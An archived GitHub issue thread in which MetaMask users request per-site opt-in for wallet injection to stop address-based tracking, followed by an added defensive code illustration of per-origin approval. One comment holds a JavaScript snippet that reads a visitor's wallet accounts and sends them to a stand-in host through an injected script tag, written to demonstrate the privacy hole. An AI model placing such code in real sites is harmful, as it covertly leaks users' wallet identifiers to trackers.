Metamask-extension: privacy: option to enable injection on per-site basis

Created on 7 Jan 2018 · 8 Comments · Source: MetaMask/metamask-extension

This issue moves a discussion from twitter to this issue-tracker as I hope here it will be a bit more fruitful. The current behavior is a big problem privacy-wise as @Arachnid pointed out very correctly:

Right now, a user's Metamask wallet address constitutes a persistent user identifier that survives cache and cookie erasure and even browser reinstalls.

@Arachnid on twitter: https://twitter.com/nicksdjohnson/status/950003999469654016

All 8 comments

Related to #537.

Thanks @tmashuang - was searching for duplicates - but did not research back to 2016 - still keeping this open to improve visibility - thinking the issue from 2016 is buried too deep ;-)

Thinking about this a bit longer - perhaps there is an option to kill 2 birds with one stone here: a site could not only have metamask on/off as state - but also the network. I see myself switching between the different networks for different sites (usually these sites then only work with one network) - so when enabling a site to have web3 injection - metamask could also ask which network (main, rinkeby, ..) to use with this site.

MetaMask should have opt-in on a per-site basis. Otherwise, anyone could put this script on their site and start tracking visitors. I think regular users don't need to know about other networks. Once the user trusts a site to see the address on mainnet, why ask the same question for other networks, which can also be mainnets, just not Infura?

```javascript
if (typeof web3 !== 'undefined' && typeof JSON !== 'undefined') {
    window.web3 = new Web3(web3.currentProvider);
    web3.eth.getAccounts(function(response,accounts) {
        if (accounts.length) {
            var script = document.createElement('script');
            script.src = 'https://example.com/?accounts=' + JSON.stringify(accounts);
            document.head.appendChild(script);
        }
    });
}
```

I expected that Metamask would only be showing my data if I unlock it, but that is still not the best. There should be a button per account to "enable it" on the site.

This is a privacy nightmare. The world is discussing supercookies and fingerprinting and MetaMask willingly exposes sensitive data to every host asking for it?

Full discussion on this feature at #714

Log-in per site is implemented in https://github.com/MetaMask/metamask-extension/pull/4703 and released in MetaMask 5.0 as per EIP 1102.
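
A minimal model of the per-site opt-in requested in this thread, added here as an illustration and not taken from MetaMask's code or the linked pull request. `AccountGate`, its methods, the placeholder address and the `.example` origins are all hypothetical; it shows why a passive account read returns nothing until the user approves that specific origin.

```javascript
// Added illustration with hypothetical names; not MetaMask's implementation.
class AccountGate {
  constructor(accounts, askUser) {
    this.accounts = accounts;   // addresses held by the wallet
    this.askUser = askUser;     // async (origin) => boolean; stands in for the approval popup
    this.approved = new Set();  // origins the user has explicitly approved
    this.locked = true;         // a locked wallet exposes nothing, approved or not
  }

  // Key approvals on scheme + host + port so http:// and https:// are distinct sites.
  static originOf(url) { return new URL(url).origin; }

  // Passive read, as done by the snippet quoted in this thread: never prompts.
  getAccounts(url) {
    const origin = AccountGate.originOf(url);
    if (this.locked || !this.approved.has(origin)) return [];
    return this.accounts.slice();
  }

  // Explicit request: the only path that can add an origin to the approved set.
  async requestAccounts(url) {
    const origin = AccountGate.originOf(url);
    if (!this.approved.has(origin)) {
      if (!(await this.askUser(origin))) {
        throw new Error('User denied account access for ' + origin);
      }
      this.approved.add(origin);
    }
    return this.getAccounts(url);
  }
}

// Constructed sample data: placeholder address and .example origins.
async function demo() {
  const gate = new AccountGate(['0x' + 'ab'.repeat(20)],
    async (origin) => origin === 'https://dapp.example');
  gate.locked = false;
  const before = gate.getAccounts('https://tracker.example/page');
  const granted = await gate.requestAccounts('https://dapp.example/app');
  const denied = await gate.requestAccounts('https://tracker.example/page')
    .catch((e) => e.message);
  const downgraded = gate.getAccounts('http://dapp.example/app');
  gate.locked = true;
  const whileLocked = gate.getAccounts('https://dapp.example/app');
  return { before, granted, denied, downgraded, whileLocked };
}
```

With this gate in place, the `accounts.length` check in the snippet above stays false on any origin the user has not approved, so no address leaves the page.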
